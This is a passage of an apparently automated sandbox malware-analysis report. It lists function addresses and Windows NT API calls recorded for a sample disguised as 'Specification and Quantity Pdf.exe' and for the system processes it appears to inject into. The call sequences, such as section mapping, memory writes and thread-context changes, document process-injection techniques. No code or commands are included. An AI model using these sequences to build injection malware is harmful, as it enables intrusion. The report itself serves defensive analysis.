Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E95CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	10_2_00E95CF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E940B1 NtQuerySystemInformation,	10_2_00E940B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E95D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	10_2_00E95D6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00E94136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	10_2_00E94136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E35C0 NtCreateMutant,LdrInitializeThunk,	10_2_044E35C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2C60 NtCreateKey,LdrInitializeThunk,	10_2_044E2C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_044E2C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_044E2CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2D00 NtSetInformationFile,LdrInitializeThunk,	10_2_044E2D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_044E2D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_044E2DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_044E2DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_044E2EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2F30 NtCreateSection,LdrInitializeThunk,	10_2_044E2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2FE0 NtCreateFile,LdrInitializeThunk,	10_2_044E2FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2AD0 NtReadFile,LdrInitializeThunk,	10_2_044E2AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2AF0 NtWriteFile,LdrInitializeThunk,	10_2_044E2AF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2B60 NtClose,LdrInitializeThunk,	10_2_044E2B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_044E2BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_044E2BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_044E2BA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E4650 NtSuspendThread,	10_2_044E4650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E3010 NtOpenDirectoryObject,	10_2_044E3010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E3090 NtSetValueKey,	10_2_044E3090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E4340 NtSetContextThread,	10_2_044E4340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2C00 NtQueryInformationProcess,	10_2_044E2C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2CC0 NtQueryVirtualMemory,	10_2_044E2CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2CF0 NtOpenProcess,	10_2_044E2CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E3D70 NtOpenThread,	10_2_044E3D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E3D10 NtOpenProcessToken,	10_2_044E3D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2D30 NtUnmapViewOfSection,	10_2_044E2D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2DB0 NtEnumerateKey,	10_2_044E2DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2E30 NtWriteVirtualMemory,	10_2_044E2E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2EE0 NtQueueApcThread,	10_2_044E2EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2E80 NtReadVirtualMemory,	10_2_044E2E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2F60 NtCreateProcessEx,	10_2_044E2F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2F90 NtProtectVirtualMemory,	10_2_044E2F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2FA0 NtQuerySection,	10_2_044E2FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2FB0 NtResumeThread,	10_2_044E2FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E39B0 NtGetContextThread,	10_2_044E39B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2AB0 NtWaitForSingleObject,	10_2_044E2AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E2B80 NtQueryInformationFile,	10_2_044E2B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035A330 NtCreateFile,	10_2_0035A330
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035A3E0 NtReadFile,	10_2_0035A3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035A460 NtClose,	10_2_0035A460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035A510 NtAllocateVirtualMemory,	10_2_0035A510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035A32B NtCreateFile,	10_2_0035A32B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035A45A NtClose,	10_2_0035A45A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035A50B NtAllocateVirtualMemory,	10_2_0035A50B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C9DDD NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtResumeThread,NtClose,	10_2_042C9DDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042CA036 NtQueryInformationProcess,NtReadVirtualMemory,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	10_2_042CA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	10_2_042C9BAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C9DE2 NtReadVirtualMemory,NtProtectVirtualMemory,	10_2_042C9DE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042CA042 NtQueryInformationProcess,	10_2_042CA042
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	10_2_042C9BB2

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C82370	0_2_00007FF773C82370
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C69340	0_2_00007FF773C69340
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C7D16A	0_2_00007FF773C7D16A
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C78830	0_2_00007FF773C78830
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C80C50	0_2_00007FF773C80C50
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C7DFD0	0_2_00007FF773C7DFD0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8B4F0	0_2_00007FF773C8B4F0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C744D0	0_2_00007FF773C744D0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C60470	0_2_00007FF773C60470
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C81470	0_2_00007FF773C81470
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773D03480	0_2_00007FF773D03480
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C59430	0_2_00007FF773C59430
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C7A420	0_2_00007FF773C7A420
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C583C4	0_2_00007FF773C583C4
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C70360	0_2_00007FF773C70360
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C84390	0_2_00007FF773C84390
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8D320	0_2_00007FF773C8D320
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C852E0	0_2_00007FF773C852E0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C892CE	0_2_00007FF773C892CE
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8F280	0_2_00007FF773C8F280
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773D2E240	0_2_00007FF773D2E240
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C58220	0_2_00007FF773C58220
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C91200	0_2_00007FF773C91200
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C78200	0_2_00007FF773C78200
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C75200	0_2_00007FF773C75200
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C891B0	0_2_00007FF773C891B0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C76190	0_2_00007FF773C76190
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8B180	0_2_00007FF773C8B180
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C888D9	0_2_00007FF773C888D9
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773CB1910	0_2_00007FF773CB1910
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C5A8B0	0_2_00007FF773C5A8B0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C6E8A0	0_2_00007FF773C6E8A0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C7A850	0_2_00007FF773C7A850
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C767F0	0_2_00007FF773C767F0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8C800	0_2_00007FF773C8C800
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8A7B0	0_2_00007FF773C8A7B0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C62750	0_2_00007FF773C62750
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C7B6B0	0_2_00007FF773C7B6B0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C73640	0_2_00007FF773C73640
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C76610	0_2_00007FF773C76610
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C835C0	0_2_00007FF773C835C0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C71520	0_2_00007FF773C71520
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8E540	0_2_00007FF773C8E540
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C74CD9	0_2_00007FF773C74CD9
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C87C79	0_2_00007FF773C87C79
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C85C20	0_2_00007FF773C85C20
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8BBA0	0_2_00007FF773C8BBA0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773D17BA0	0_2_00007FF773D17BA0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C7FB40	0_2_00007FF773C7FB40
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773D12AC0	0_2_00007FF773D12AC0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C66A50	0_2_00007FF773C66A50
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C56A50	0_2_00007FF773C56A50
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C79A50	0_2_00007FF773C79A50
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C94A40	0_2_00007FF773C94A40
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C61A00	0_2_00007FF773C61A00
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C899C3	0_2_00007FF773C899C3
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8F960	0_2_00007FF773C8F960
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773D200E0	0_2_00007FF773D200E0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C680D0	0_2_00007FF773C680D0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C6EFE0	0_2_00007FF773C6EFE0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C83F60	0_2_00007FF773C83F60
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C8BEA0	0_2_00007FF773C8BEA0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C7FDD0	0_2_00007FF773C7FDD0
Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: 0_2_00007FF773C72D30	0_2_00007FF773C72D30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0040120A	6_2_0040120A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00402D87	6_2_00402D87
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00409E5B	6_2_00409E5B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00409E60	6_2_00409E60
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041DECA	6_2_0041DECA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0041D730	6_2_0041D730
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0388739A	6_2_0388739A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E3F0	6_2_0384E3F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039003E6	6_2_039003E6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F132D	6_2_038F132D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382D34C	6_2_0382D34C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FA352	6_2_038FA352
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038452A0	6_2_038452A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B2C0	6_2_0385B2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E12ED	6_2_038E12ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0274	6_2_038E0274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384B1B0	6_2_0384B1B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039001AA	6_2_039001AA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F81CC	6_2_038F81CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03830100	6_2_03830100
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038DA118	6_2_038DA118
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0387516C	6_2_0387516C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0390B16B	6_2_0390B16B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EF0CC	6_2_038EF0CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F70E9	6_2_038F70E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FF0E0	6_2_038FF0E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FF7B0	6_2_038FF7B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383C7C0	6_2_0383C7C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03864750	6_2_03864750
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F16CC	6_2_038F16CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385C6E0	6_2_0385C6E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03900591	6_2_03900591
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038DD5B0	6_2_038DD5B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840535	6_2_03840535
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F7571	6_2_038F7571
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EE4F6	6_2_038EE4F6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FF43F	6_2_038FF43F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F2446	6_2_038F2446
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03831460	6_2_03831460
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385FB80	6_2_0385FB80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F6BD7	6_2_038F6BD7
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0387DBF9	6_2_0387DBF9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FAB40	6_2_038FAB40
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FFB76	6_2_038FFB76
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383EA80	6_2_0383EA80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038DDAAC	6_2_038DDAAC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03885AA0	6_2_03885AA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EDAC6	6_2_038EDAC6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FFA49	6_2_038FFA49
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F7A46	6_2_038F7A46
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B3A6C	6_2_038B3A6C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038429A0	6_2_038429A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0390A9A6	6_2_0390A9A6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03849950	6_2_03849950
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B950	6_2_0385B950
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03856962	6_2_03856962
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038268B8	6_2_038268B8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038438E0	6_2_038438E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386E8F0	6_2_0386E8F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AD800	6_2_038AD800
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03842840	6_2_03842840
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384A840	6_2_0384A840
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841F92	6_2_03841F92
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FFFB1	6_2_038FFFB1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03832FC8	6_2_03832FC8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384CFE0	6_2_0384CFE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FFF09	6_2_038FFF09
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03882F28	6_2_03882F28
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03860F30	6_2_03860F30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B4F40	6_2_038B4F40
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03852E90	6_2_03852E90
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FCE93	6_2_038FCE93
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03849EB0	6_2_03849EB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FEEDB	6_2_038FEEDB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FEE26	6_2_038FEE26
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840E59	6_2_03840E59
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03858DBF	6_2_03858DBF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385FDC0	6_2_0385FDC0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383ADE0	6_2_0383ADE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384AD00	6_2_0384AD00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03843D40	6_2_03843D40
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F1D5A	6_2_038F1D5A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F7D73	6_2_038F7D73
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038E0CB5	6_2_038E0CB5
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03830CF2	6_2_03830CF2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038FFCF2	6_2_038FFCF2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840C00	6_2_03840C00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B9C32	6_2_038B9C32
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5A036	6_2_03B5A036
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5B232	6_2_03B5B232
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B51082	6_2_03B51082
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B5E5CD	6_2_03B5E5CD
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B55B30	6_2_03B55B30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B55B32	6_2_03B55B32
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B58912	6_2_03B58912
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03B52D02	6_2_03B52D02
Source: C:\Windows\explorer.exe	Code function: 8_2_0E794232	8_2_0E794232
Source: C:\Windows\explorer.exe	Code function: 8_2_0E78EB30	8_2_0E78EB30
Source: C:\Windows\explorer.exe	Code function: 8_2_0E78EB32	8_2_0E78EB32
Source: C:\Windows\explorer.exe	Code function: 8_2_0E793036	8_2_0E793036
Source: C:\Windows\explorer.exe	Code function: 8_2_0E78A082	8_2_0E78A082
Source: C:\Windows\explorer.exe	Code function: 8_2_0E791912	8_2_0E791912
Source: C:\Windows\explorer.exe	Code function: 8_2_0E78BD02	8_2_0E78BD02
Source: C:\Windows\explorer.exe	Code function: 8_2_0E7975CD	8_2_0E7975CD
Source: C:\Windows\explorer.exe	Code function: 8_2_10A47232	8_2_10A47232
Source: C:\Windows\explorer.exe	Code function: 8_2_10A3D082	8_2_10A3D082
Source: C:\Windows\explorer.exe	Code function: 8_2_10A46036	8_2_10A46036
Source: C:\Windows\explorer.exe	Code function: 8_2_10A4A5CD	8_2_10A4A5CD
Source: C:\Windows\explorer.exe	Code function: 8_2_10A41B30	8_2_10A41B30
Source: C:\Windows\explorer.exe	Code function: 8_2_10A41B32	8_2_10A41B32
Source: C:\Windows\explorer.exe	Code function: 8_2_10A3ED02	8_2_10A3ED02
Source: C:\Windows\explorer.exe	Code function: 8_2_10A44912	8_2_10A44912
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04562446	10_2_04562446
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044A1460	10_2_044A1460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456F43F	10_2_0456F43F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0455E4F6	10_2_0455E4F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04567571	10_2_04567571
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B0535	10_2_044B0535
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04570591	10_2_04570591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0454D5B0	10_2_0454D5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_045616CC	10_2_045616CC
